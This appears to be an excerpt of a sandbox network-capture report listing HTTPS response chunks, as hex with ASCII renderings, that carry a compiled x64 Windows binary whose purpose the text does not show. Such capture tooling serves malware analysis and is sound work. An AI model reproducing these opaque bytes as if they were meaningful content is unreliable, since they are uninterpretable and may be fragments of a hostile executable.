                                                                            2022-05-23 16:59:17 UTC880INData Raw: 06 e8 46 f7 ff ff 90 48 8b c3 48 83 c4 30 5b c3 cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 40 e8 76 fe ff ff 48 83 c4 20 5d c3 48 89 4c 24 08 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 8d 05 cf 8e 04 00 48 89 01 e8 ff fd ff ff 48 8b d0 48 8b 4b 20 ff 15 7a 7e 04 00 90 48 8b cb 48 83 c4 30 5b e9 30 fe ff ff 40 55 48 83 ec 20 48 8b ea 48 8b 4d 40 e8 1e fe ff ff 48 83 c4 20 5d c3 48 89 4c 24 08 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 c7 41 08 00 00 00 00 48 c7 41 10 00 00 00 00 c7 41 18 00 00 00 00 48 8d 05 b0 8f 04 00 48 89 01 48 8b 4a 40 48 89 4b 20 48 8d 53 28 ff 15 53 7d 04 00 48 8b d0 48 8b cb e8 2c fd ff ff 85 c0 75 06 e8 6b f6 ff ff 90 48 8b c3 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b
                                                                            Data Ascii: FHH0[@UH HHM@vH ]HL$SH0HD$ HHHHHK z~HH0[0@UH HHM@H ]HL$SH0HD$ HHAHAAHHHJ@HK HS(S}HH,ukHH0[@UH HH
                                                                            2022-05-23 16:59:17 UTC896INData Raw: 74 0c 48 8b 54 24 28 33 c9 e8 92 88 ff ff 8b c3 48 83 c4 60 5f 5e 5b c3 cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8d 4d 28 e8 ae ed ff ff 48 83 c4 20 5d c3 40 53 48 83 ec 40 48 c7 44 24 20 fe ff ff ff 48 8d 59 98 48 8b 53 38 48 8d 4c 24 28 e8 9f 99 ff ff 90 48 8b cb e8 6e ad 01 00 8b d8 83 7c 24 30 00 74 0c 48 8b 54 24 28 33 c9 e8 29 88 ff ff 8b c3 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8d 4d 28 e8 46 ed ff ff 48 83 c4 20 5d c3 40 53 48 83 ec 40 48 c7 44 24 20 fe ff ff ff 48 8d 59 98 48 8b 53 38 48 8d 4c 24 28 e8 37 99 ff ff 90 48 8b cb e8 aa ad 01 00 8b d8 83 7c 24 30 00 74 0c 48 8b 54 24 28 33 c9 e8 c1 87 ff ff 8b c3 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8d 4d 28 e8 de
                                                                            Data Ascii: tHT$(3H`_^[@UH HHM(H ]@SH@HD$ HYHS8HL$(Hn|$0tHT$(3)H@[@UH HHM(FH ]@SH@HD$ HYHS8HL$(7H|$0tHT$(3H@[@UH HHM(
                                                                            2022-05-23 16:59:17 UTC912INData Raw: fc 49 c1 ec 10 45 0f bf e4 48 83 f9 2a 75 1a 48 8b ce e8 f1 cb ff ff 4c 8b c8 45 8b c4 8b d7 48 8b cd ff d3 e9 b8 02 00 00 45 8b c4 8b d7 48 8b cd ff d3 e9 a9 02 00 00 49 8b c4 48 c1 e8 10 0f b7 f8 48 8b ce e8 be cb ff ff 4c 8b c0 41 0f b7 d4 44 8b cf 48 8b cd ff d3 e9 83 02 00 00 48 8b cd ff d3 48 89 44 24 30 e9 74 02 00 00 49 8b cc e8 93 cb ff ff 48 8b d0 4c 8b c6 48 8b cd ff d3 e9 5c 02 00 00 0f bf c6 89 44 24 38 48 c1 ee 10 0f bf c6 89 44 24 3c 49 8b cc e8 69 cb ff ff 48 8b d0 4c 8b 44 24 38 48 8b cd ff d3 e9 30 02 00 00 48 8b c6 48 c1 e8 10 0f b7 f8 0f b7 f6 49 8b cc e8 42 cb ff ff 48 8b d0 44 8b cf 44 8b c6 48 8b cd ff d3 e9 08 02 00 00 48 8b d6 48 8b cd ff d3 e9 fb 01 00 00 48 83 f9 33 0f 87 c6 00 00 00 48 83 f9 33 0f 84 af 00 00 00 48 83 e9 2d 0f
                                                                            Data Ascii: IEH*uHLEHEHIHHLADHHHD$0tIHLH\D$8HD$<IiHLD$8H0HHIBHDDHHHH3H3H-
                                                                            2022-05-23 16:59:17 UTC928INData Raw: 57 41 54 48 83 ec 40 45 33 c0 48 8b d9 48 8b 49 40 48 8b fa 4c 8b ca 41 8d 50 46 ff 15 97 bd 03 00 f6 47 20 01 0f 85 0e 01 00 00 48 8b 4b 40 48 8d 54 24 30 ff 15 c6 bd 03 00 44 8b 67 18 8b 6c 24 38 8b 74 24 3c 2b 6c 24 30 8b 7f 1c 2b 74 24 34 44 3b e5 74 6f 0f ba a3 dc 00 00 00 0a 73 65 41 8b d4 48 8d 4c 24 30 45 8b cc 2b 15 1f c0 05 00 45 33 c0 89 7c 24 20 ff 15 6a bb 03 00 48 8b 4b 40 48 8d 54 24 30 41 b8 01 00 00 00 ff 15 d5 be 03 00 8b d5 48 8d 4c 24 30 2b 15 f0 bf 05 00 44 8b cd 45 33 c0 89 7c 24 20 ff 15 38 bb 03 00 48 8b 4b 40 48 8d 54 24 30 41 b8 01 00 00 00 ff 15 a3 be 03 00 3b fe 74 70 0f ba a3 dc 00 00 00 0b 73 66 44 8b c7 48 8d 4c 24 30 45 8b cc 44 2b 05 af bf 05 00 33 d2 89 7c 24 20 ff 15 f7 ba 03 00 48 8b 4b 40 48 8d 54 24 30 41 b8 01 00 00
                                                                            Data Ascii: WATH@E3HHI@HLAPFG HK@HT$0Dgl$8t$<+l$0+t$4D;toseAHL$0E+E3|$ jHK@HT$0AHL$0+DE3|$ 8HK@HT$0A;tpsfDHL$0ED+3|$ HK@HT$0A
                                                                            2022-05-23 16:59:17 UTC944INData Raw: 85 c9 75 0b b9 05 40 00 80 e8 2a c9 fe ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 40 e8 0a c5 00 00 4c 8b d8 33 c9 48 85 c0 0f 95 c1 85 c9 75 0b b9 05 40 00 80 e8 f9 c8 fe ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 38 8b 57 08 83 ea 01 48 8d 84 24 b8 00 00 00 48 89 44 24 20 4c 8d 4c 24 30 4c 8d 84 24 a8 00 00 00 48 8b cd e8 f6 e4 ff ff 8b 8c 24 a8 00 00 00 e8 5a c3 00 00 48 85 c0 0f 84 9e 00 00 00 44 8b 84 24 a8 00 00 00 48 8b d0 48 8d 4c 24 40 e8 00 cf fe ff 85 c0 0f 84 81 00 00 00 66 41 b9 0a 00 41 b8 01 00 00 00 48 8b 54 24 40 48 8d 4c 24 38 e8 2e c3 00 00 48 8b 4c 24 38 8b 51 f0 ff 15 dc 79 03 00 48 85 c0 75 06 e8 ea c8 fe ff cc 48 89 06 48 8b 54 24 38 48 83 c2 e8 b8 ff ff ff ff f0 0f c1 42 10 83 c0 ff 85 c0 7f 0a 48 8b 0a
                                                                            Data Ascii: u@*HIPHHD$@L3Hu@HIPHHD$8WH$HD$ LL$0L$H$ZHD$HHL$@fAAHT$@HL$8.HL$8QyHuHHT$8HBH
                                                                            2022-05-23 16:59:18 UTC960INData Raw: 4c 24 70 4c 8d 44 24 54 8b d3 48 8b 4c 24 68 e8 5c a5 ff ff f6 44 24 70 01 0f 85 c5 02 00 00 c7 84 24 84 01 00 00 62 01 00 00 8b 5c 24 54 8b cb e8 ab 83 00 00 48 85 c0 74 15 44 8b c3 48 8b d0 48 8d 4c 24 60 e8 5a 8f fe ff 48 8b 7c 24 60 66 41 b9 0a 00 41 b8 01 00 00 00 48 8b d7 48 8d 4c 24 58 e8 8d 83 00 00 b9 10 00 00 00 e8 e3 87 fe ff 48 85 c0 74 14 48 c7 40 08 00 00 00 00 48 8d 0d 4b 51 03 00 48 89 08 eb 02 33 c0 8b 94 24 c0 02 00 00 4c 8b c0 48 8d 4c 24 78 e8 64 ca 00 00 48 8b 9c 24 b8 00 00 00 48 8b 5b 08 e8 cb 98 fe ff 48 8b 88 c8 00 00 00 4c 8d 8c 24 e0 01 00 00 44 8b 44 24 50 48 8b d3 48 8b 09 e8 84 e8 ff ff 48 8d 94 24 f8 01 00 00 48 8d 8c 24 a0 00 00 00 ff 15 aa 3e 03 00 44 8b 9c 24 a4 00 00 00 41 f7 db 8b 94 24 a0 00 00 00 f7 da 89 94 24 b0 00
                                                                            Data Ascii: L$pLD$THL$h\D$p$b\$THtDHHL$`ZH|$`fAAHHL$XHtH@HKQH3$LHL$xdH$H[HL$DD$PHHH$H$>D$A$$
                                                                            2022-05-23 16:59:18 UTC976INData Raw: c0 00 00 00 e8 17 4a 01 00 48 8b 8b c8 00 00 00 e8 0b 4a 01 00 48 8b 8b d0 00 00 00 e8 ff 49 01 00 48 c7 43 58 00 00 00 00 48 8b cb 48 83 c4 38 5e 5b e9 0d f3 ff ff cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 50 e8 f6 f2 ff ff 48 83 c4 20 5d c3 40 53 48 83 ec 20 48 83 b9 10 01 00 00 00 48 8b d9 74 0d 48 8b 89 10 01 00 00 48 8b 01 ff 50 28 44 8b 8b 24 01 00 00 45 85 c9 74 16 4c 8d 05 29 58 03 00 48 8d 15 0a 58 03 00 48 8b cb e8 1e d5 00 00 48 83 c4 20 5b c3 40 53 57 48 83 ec 28 48 8b 81 18 01 00 00 33 db 48 8b f9 48 3b c3 74 0c 83 78 14 06 74 18 83 78 14 05 74 12 e8 b7 58 fe ff 38 58 28 75 08 48 8b cf e8 82 ff ff ff 48 8b 87 30 01 00 00 48 3b c3 74 02 ff d0 48 8b 8f f8 00 00 00 48 3b cb 74 0d ff 15 1e f9 02 00 48 89 9f f8 00 00 00 e8 56 f1 ff ff 48
                                                                            Data Ascii: JHJHIHCXHH8^[@UH HHMPH ]@SH HHtHHP(D$EtL)XHXHH [@SWH(H3HH;txtxtX8X(uHH0H;tHH;tHVH
                                                                            2022-05-23 16:59:18 UTC992INData Raw: f1 48 8d 4f 28 ff 15 e5 b8 02 00 eb 0a 48 8d 4f 28 ff 15 d9 b8 02 00 48 83 c4 30 41 5d 41 5c 5f 5e 5b c3 cc 48 89 54 24 10 55 48 83 ec 20 48 8b ea 48 8b 4d 60 48 83 c1 28 ff 15 b1 b8 02 00 33 d2 33 c9 e8 58 19 01 00 90 48 83 c4 20 5d c3 cc 40 53 48 83 ec 20 f6 c2 01 48 8b d9 74 0b 48 85 c9 74 06 ff 15 8f b8 02 00 48 8b c3 48 83 c4 20 5b c3 cc cc 40 53 55 56 57 41 54 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 4c 8b e2 48 8b f9 33 c0 48 85 d2 0f 95 c0 85 c0 75 06 e8 a5 d8 fe ff cc 83 39 00 75 44 48 8b 05 44 bc 04 00 48 85 c0 75 24 48 8d 0d 48 bc 04 00 48 89 4c 24 68 e8 9a fb ff ff 90 48 89 05 26 bc 04 00 48 85 c0 75 06 e8 70 d8 fe ff cc 48 8b c8 e8 cf fb ff ff 89 07 85 c0 75 06 e8 5c d8 fe ff cc 48 63 1f 48 8b 2d fd bb 04 00 48 8d 4d 28 ff 15 e3 b7 02 00 85 db
                                                                            Data Ascii: HO(HO(H0A]A\_^[HT$UH HHM`H(33XH ]@SH HtHtHH [@SUVWATH0HD$ LH3Hu9uDHDHu$HHHL$hH&HupHu\HcH-HM(
                                                                            2022-05-23 16:59:18 UTC1008INData Raw: 89 47 50 33 d2 48 8b cf 48 89 5f 08 e8 8f fb ff ff 48 83 c4 58 5f 5b c3 40 53 57 48 83 ec 28 ba 01 00 00 00 48 8b d9 e8 74 fb ff ff ff 15 4e 7b 02 00 ff 15 78 7b 02 00 48 8b c8 e8 c8 4b fe ff 33 c9 48 8b f8 ff 15 15 7f 02 00 48 8b 93 98 00 00 00 48 85 d2 74 19 48 8b 52 08 48 8b 4f 40 ff 15 73 7e 02 00 48 c7 83 98 00 00 00 00 00 00 00 48 83 c4 28 5f 5b c3 cc 40 53 57 48 83 ec 38 48 8b d9 e8 91 ff ff ff 8b 93 84 00 00 00 85 d2 0f 84 8b 00 00 00 48 8b cb e8 ff f7 ff ff f7 83 84 00 00 00 00 50 00 00 48 8d 4b 3c 48 8d 53 2c 48 8b f8 48 0f 45 d1 f3 0f 6f 02 f3 0f 7f 44 24 20 48 8b 48 40 ff 15 ee 7d 02 00 0f b7 d0 8d 8a e5 17 ff ff 83 f9 03 77 1f f3 0f 6f 44 24 20 89 93 a8 00 00 00 48 8d 93 ac 00 00 00 48 8b cf f3 0f 7f 02 e8 b5 fa fd ff 48 8b 53 70 48 8b 4b 78
                                                                            Data Ascii: GP3HH_HX_[@SWH(HtN{x{HK3HHHtHRHO@s~HH(_[@SWH8HHPHK<HS,HHEoD$ HH@}woD$ HHHSpHKx
                                                                            2022-05-23 16:59:18 UTC1024INData Raw: b8 fd ff ff 85 c0 78 2f 48 8b 4c 24 20 48 85 c9 75 07 b8 03 40 00 80 eb 1e 48 8b 01 4c 8b cb 4c 8b c7 48 8b d6 ff 50 18 48 8b 4c 24 20 48 8b 11 8b d8 ff 52 10 8b c3 48 83 c4 30 5f 5e 5b c3 cc 40 53 55 56 57 48 81 ec 38 03 00 00 48 c7 44 24 50 fe ff ff ff 48 8b 05 6c e8 03 00 48 33 c4 48 89 84 24 20 03 00 00 41 8b e9 49 8b f0 48 8b da 48 8b f9 48 c7 44 24 38 00 00 00 00 66 41 c7 00 00 00 48 85 c9 75 07 33 c0 e9 80 01 00 00 c7 44 24 20 00 08 00 00 41 b9 b8 02 00 00 4c 8d 44 24 60 33 d2 48 8b cb ff 15 1c 3a 02 00 48 85 c0 0f 84 57 01 00 00 0f ba 64 24 6c 10 0f 83 4b 01 00 00 48 8d 44 24 38 48 89 44 24 20 4c 8d 0d de b7 02 00 45 33 c0 48 8d 15 c4 b7 02 00 48 8d 4c 24 30 e8 de fe ff ff 85 c0 0f 88 1a 01 00 00 48 8b 4c 24 38 48 85 c9 0f 84 0c 01 00 00 48 c7 44
                                                                            Data Ascii: x/HL$ Hu@HLLHPHL$ HRH0_^[@SUVWH8HD$PHlH3H$ AIHHHD$8fAHu3D$ ALD$`3H:HWd$lKHD$8HD$ LE3HHL$0HL$8HHD
                                                                            2022-05-23 16:59:18 UTC1040INData Raw: e8 bf f0 ff ff 85 c0 0f 85 f6 00 00 00 48 8b 54 24 40 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 20 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 28 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 50 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 38 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 48 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 30 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 0f 8f d8 0c 00 00 48 8b 0a 48 8b 01 ff 50 08 e9
                                                                            Data Ascii: HT$@HABAHHPHT$ HABAHHPHT$(HABAHHPHT$PHABAHHPHT$8HABAHHPHT$HHABAHHPHT$0HABAHHP
                                                                            2022-05-23 16:59:18 UTC1056INData Raw: 75 0c 66 41 81 fc 0e 04 0f 84 d2 00 00 00 81 ff 00 c0 00 00 0f 82 ed fe ff ff 48 8b cb e8 22 8c fd ff 48 85 c0 48 8b d8 0f 84 d9 fe ff ff 48 8d 15 f3 45 02 00 48 8b c8 e8 73 0c ff ff 85 c0 74 13 48 8b cb e8 b3 f2 ff ff 0f ba 60 60 13 0f 82 b3 fe ff ff 3b 3d b6 c0 03 00 75 14 48 8b 03 48 8b d5 48 8b cb ff 90 b8 02 00 00 e9 76 ff ff ff 3b 3d 9e c0 03 00 75 22 48 8b 03 48 8b cb 48 89 ab 88 03 00 00 ff 90 c0 02 00 00 48 c7 83 88 03 00 00 00 00 00 00 48 98 eb 62 3b 3d 6c c0 03 00 75 24 4c 8b 13 48 8b c5 44 0f b7 c5 48 c1 e8 10 41 8b d4 48 8b cb 44 0f b7 c8 41 ff 92 c8 02 00 00 e9 41 fe ff ff 3b 3d 4c c0 03 00 0f 85 35 fe ff ff 48 8b 03 48 8b cb ff 90 b8 02 00 00 eb b6 45 33 c9 41 b8 46 e1 00 00 48 8b cb ff 15 86 be 01 00 48 b8 01 00 00 00 00 00 00 00 48 83 c4
                                                                            Data Ascii: ufAH"HHHEHstH``;=uHHHv;=u"HHHHHb;=lu$LHDHAHDAA;=L5HHE3AFHHH
                                                                            2022-05-23 16:59:18 UTC1072INData Raw: 4d 85 ed 49 0f 45 de 33 f6 eb 61 41 0f af f4 03 f1 40 8a 3b 48 83 c3 01 eb 86 40 f6 c5 04 75 21 40 f6 c5 01 75 46 8b c5 83 e0 02 74 08 81 fe 00 00 00 80 77 0c 85 c0 75 33 81 fe ff ff ff 7f 76 2b e8 fa e2 ff ff 40 f6 c5 01 c7 00 22 00 00 00 74 07 be ff ff ff ff eb 13 40 f6 c5 02 be 00 00 00 00 40 0f 95 c6 81 c6 ff ff ff 7f 4d 85 ed 74 04 49 89 5d 00 40 f6 c5 02 74 02 f7 de 80 7c 24 48 00 74 0c 48 8b 4c 24 40 83 a1 c8 00 00 00 fd 8b c6 eb 1e 4d 85 ed 74 04 4d 89 75 00 40 38 74 24 48 74 0c 48 8b 44 24 40 83 a0 c8 00 00 00 fd 33 c0 48 8b 6c 24 78 48 8b 74 24 70 48 8b 9c 24 80 00 00 00 48 8b 7c 24 68 4c 8b 74 24 50 4c 8b 6c 24 58 4c 8b 64 24 60 48 81 c4 88 00 00 00 c3 48 83 ec 38 83 3d 95 8e 03 00 00 45 8b c8 4c 8b c2 48 8b d1 c7 44 24 20 00 00 00 00 75 11 48
                                                                            Data Ascii: MIE3aA@;H@u!@uFtwu3v+@"t@@MtI]@t|$HtHL$@MtMu@8t$HtHD$@3Hl$xHt$pH$H|$hLt$PLl$XLd$`HH8=ELHD$ uH
                                                                            2022-05-23 16:59:18 UTC1088INData Raw: 89 7c 24 58 44 89 74 24 48 0f 89 f8 09 00 00 41 be ff ff ff ff 44 89 74 24 48 e9 e8 09 00 00 43 8d 0c b6 41 0f b7 c4 44 8d 74 48 d0 44 89 74 24 48 e9 d1 09 00 00 41 0f b7 c4 83 f8 49 74 50 83 f8 68 74 3f 83 f8 6c 74 16 83 f8 77 0f 85 b5 09 00 00 0f ba ee 0b 89 74 24 40 e9 a8 09 00 00 66 41 83 39 6c 75 11 49 83 c1 02 0f ba ee 0c 89 74 24 40 e9 90 09 00 00 83 ce 10 89 74 24 40 e9 84 09 00 00 83 ce 20 89 74 24 40 e9 78 09 00 00 41 0f b7 01 0f ba ee 0f 66 3d 36 00 89 74 24 40 75 19 66 41 83 79 02 34 75 11 49 83 c1 04 0f ba ee 0f 89 74 24 40 e9 4d 09 00 00 66 3d 33 00 75 19 66 41 83 79 02 32 75 11 49 83 c1 04 0f ba f6 0f 89 74 24 40 e9 2e 09 00 00 66 3d 64 00 0f 84 24 09 00 00 66 3d 69 00 0f 84 1a 09 00 00 66 3d 6f 00 0f 84 10 09 00 00 66 3d 75 00 0f 84 06 09
                                                                            Data Ascii: |$XDt$HADt$HCADtHDt$HAItPht?ltwt$@fA9luIt$@t$@ t$@xAf=6t$@ufAy4uIt$@Mf=3ufAy2uIt$@.f=d$f=if=of=u
                                                                            2022-05-23 16:59:18 UTC1104INData Raw: 48 83 c1 04 41 83 c2 01 39 11 7c f4 48 8b 5c 24 40 41 83 ea 01 49 63 ca 45 89 50 10 41 2b 04 89 41 89 40 0c 48 8b c6 48 8b 74 24 50 48 f7 2f 48 8b 7c 24 58 48 8b ca 48 c1 f9 0d 41 89 68 20 48 8b 6c 24 48 48 8b c1 48 c1 e8 3f 48 03 c8 b8 93 24 49 92 83 c1 04 f7 e9 03 d1 c1 fa 02 8b c2 c1 e8 1f 03 d0 48 b8 05 7c f3 6a e2 59 d1 48 6b d2 07 2b ca 49 f7 eb 41 89 48 18 48 c1 fa 0a 48 8b c2 48 c1 e8 3f 48 03 d0 48 63 c2 41 89 50 08 48 69 c0 f0 f1 ff ff 4c 03 d8 48 b8 89 88 88 88 88 88 88 88 49 f7 eb 49 03 d3 48 c1 fa 05 48 8b c2 48 c1 e8 3f 48 03 d0 41 89 50 04 6b d2 3c 44 2b da 33 c0 45 89 18 48 83 c4 38 c3 cc cc cc cc cc 48 83 ec 38 48 85 c9 75 2d e8 62 62 ff ff 45 33 c9 45 33 c0 33 d2 33 c9 48 c7 44 24 20 00 00 00 00 c7 00 16 00 00 00 e8 94 7a ff ff b8 16 00
                                                                            Data Ascii: HA9|H\$@AIcEPA+A@HHt$PH/H|$XHHAh Hl$HHH?H$IH|jYHk+IAHHHH?HHcAPHiLHIIHHH?HAPk<D+3EH8H8Hu-bbE3E333HD$ z
                                                                            2022-05-23 16:59:18 UTC1120INData Raw: 0d 33 d2 8b cb 44 8d 42 02 e8 a2 fc ff ff 8b cb e8 6b 08 00 00 85 c0 0f 84 a3 02 00 00 48 8d 15 7c e6 02 00 4a 8b 04 fa 41 f6 44 05 08 80 0f 84 a5 02 00 00 e8 27 44 ff ff 33 db 48 8d 54 24 48 48 8b 88 c0 00 00 00 48 8d 05 52 e6 02 00 39 59 14 4a 8b 0c f8 49 8b 4c 0d 00 0f 94 c3 ff 15 cd b6 00 00 85 c0 0f 84 67 02 00 00 85 db 74 09 40 84 ff 0f 84 51 02 00 00 ff 15 aa b6 00 00 85 ed 89 74 24 4c 44 8b e8 89 44 24 48 49 8b dc 0f 84 22 02 00 00 44 8b 7c 24 48 66 66 90 66 66 66 90 40 84 ff 0f 85 57 01 00 00 0f be 0b 45 33 ff 80 f9 0a 41 0f 94 c7 e8 45 0e 00 00 85 c0 75 20 44 8d 40 01 48 8d 4c 24 40 48 8b d3 e8 80 11 00 00 83 f8 ff 75 35 44 8b 7c 24 48 e9 e8 04 00 00 48 8b c5 48 2b c3 49 03 c4 48 83 f8 01 7e e7 48 8d 4c 24 40 41 b8 02 00 00 00 48 8b d3 e8 4f 11
                                                                            Data Ascii: 3DBkH|JAD'D3HT$HHHR9YJILgt@Qt$LDD$HI"D|$Hfffff@WE3AEu D@HL$@Hu5D|$HHH+IH~HL$@AHO
                                                                            2022-05-23 16:59:18 UTC1136INData Raw: 48 83 ec 38 48 89 5c 24 40 48 89 74 24 48 48 89 7c 24 50 4c 89 64 24 58 45 33 e4 41 8b fc 41 8d 4c 24 01 e8 a8 5e ff ff 90 bb 03 00 00 00 89 5c 24 20 3b 1d 48 a6 02 00 7d 6a 48 63 f3 48 8b 05 24 96 02 00 48 83 3c f0 00 74 50 48 8b 0c f0 f6 41 18 83 74 11 e8 26 41 00 00 83 f8 ff 74 07 83 c7 01 89 7c 24 24 83 fb 14 7c 30 48 8b 05 f6 95 02 00 48 8b 0c f0 48 83 c1 30 ff 15 28 78 00 00 48 8b 0d e1 95 02 00 48 8b 0c f1 e8 90 c9 fe ff 4c 8b 1d d1 95 02 00 4d 89 24 f3 83 c3 01 89 5c 24 20 eb 8e b9 01 00 00 00 e8 f2 5c ff ff 8b c7 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 4c 8b 64 24 58 48 83 c4 38 c3 cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea b9 01 00 00 00 e8 bd 5c ff ff 48 83 c4 20 5d c3 cc cc cc cc cc cc cc 48 83 ec 28 48 89 5c 24 38 48 8b d9 8b 49 18
                                                                            Data Ascii: H8H\$@Ht$HH|$PLd$XE3AAL$^\$ ;H}jHcH$H<tPHAt&At|$$|0HHH0(xHHLM$\$ \H\$@Ht$HH|$PLd$XH8@UH H\H ]H(H\$8HI
                                                                            2022-05-23 16:59:18 UTC1152INData Raw: d8 74 cd 2b d8 80 7c 24 48 00 74 0c 48 8b 4c 24 40 83 a1 c8 00 00 00 fd 8b c3 48 8b 5c 24 60 48 8b 7c 24 78 48 8b 74 24 70 48 8b 6c 24 68 48 83 c4 58 c3 33 c0 48 8b 7c 24 78 48 8b 74 24 70 48 8b 6c 24 68 48 83 c4 58 c3 cc cc cc cc cc cc cc 48 83 ec 48 33 c0 48 8d 0d bb e7 00 00 45 33 c9 48 89 44 24 30 89 44 24 28 44 8d 40 03 ba 00 00 00 40 c7 44 24 20 03 00 00 00 ff 15 00 37 00 00 48 89 05 89 fd 01 00 48 83 c4 48 c3 cc cc cc cc 48 83 ec 28 48 8b 0d 75 fd 01 00 48 83 f9 ff 74 0c 48 83 f9 fe 74 06 ff 15 9b 38 00 00 48 8b 0d 54 fd 01 00 48 83 f9 ff 74 0c 48 83 f9 fe 74 06 ff 15 82 38 00 00 48 83 c4 28 c3 cc cc cc cc cc 48 83 ec 38 48 85 c9 48 89 5c 24 50 48 89 74 24 58 be ff ff ff ff 48 8b d9 75 30 e8 50 a2 fe ff 45 33 c9 45 33 c0 33 d2 33 c9 48 89 5c 24 20
                                                                            Data Ascii: t+|$HtHL$@H\$`H|$xHt$pHl$hHX3H|$xHt$pHl$hHXHH3HE3HD$0D$(D@@D$ 7HHHH(HuHtHt8HTHtHt8H(H8HH\$PHt$XHu0PE3E333H\$
                                                                            2022-05-23 16:59:18 UTC1168INData Raw: 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 f0 4f 05 10 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 20 50 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 50 05 10 00 00 00 00 06 0f 0f 0f 06 00 00 00 20 4f 05 10 00 00 00 00 40 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 78 b6 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 50 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 10 06 10 00 00 00 00 20 ab 00 10 00 00 00 00 d0 ab 00 10 00 00 00 00 28 ae 00 10 00 00 00 00 60 ac 00 10 00 00 00 00 43 49 6d 61 67 65 4c 69 73 74 00 00 00 00 00
                                                                            Data Ascii: O P@P O@xP (`CImageList
                                                                            2022-05-23 16:59:18 UTC1184INData Raw: 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 c4 8a 03 10 00 00 00 00 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 00 00 00 00 00 00 00 00 be 01 10 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 00 00 00 00 00 00 00 74 be 01 10 00 00 00 00 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 04 b6 01 10 00 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 34 cb 01 10 00 00 00 00 1f 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 28 cb 01 10 00 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 64 b2 01 10 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 64 b2 01 10 00 00 00
                                                                            Data Ascii: 2F3t 4(d0d
                                                                            2022-05-23 16:59:18 UTC1200INData Raw: 22 05 93 19 01 00 00 00 08 7e 06 00 00 00 00 00 00 00 00 00 03 00 00 00 10 7e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 54 7e 06 00 00 00 00 00 00 00 00 00 03 00 00 00 5c 7e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 8c 7e 06 00 00 00 00 00 00 00 00 00 05 00 00 00 94 7e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 cc 7e 06 00 00 00 00 00 00 00 00 00 05 00 00 00 d4 7e 06 00 30 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 0a 00 00 00 28 7f 06 00 00 00 00 00 00 00 00 00 63 00 00 00 78 7f 06 00 68 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 10 00 00 00 ac 82 06 00 00 00 00 00 00 00 00 00 25 00 00 00 2c 83 06 00 f0 00 00 00 00 00 00 00 01 00 00 00 22 00 2c 00 22 00 00 00 5b 00 70 00 72 00 69
                                                                            Data Ascii: "~~ "T~\~ "~~ "~~0"(cxh"%,","[pri
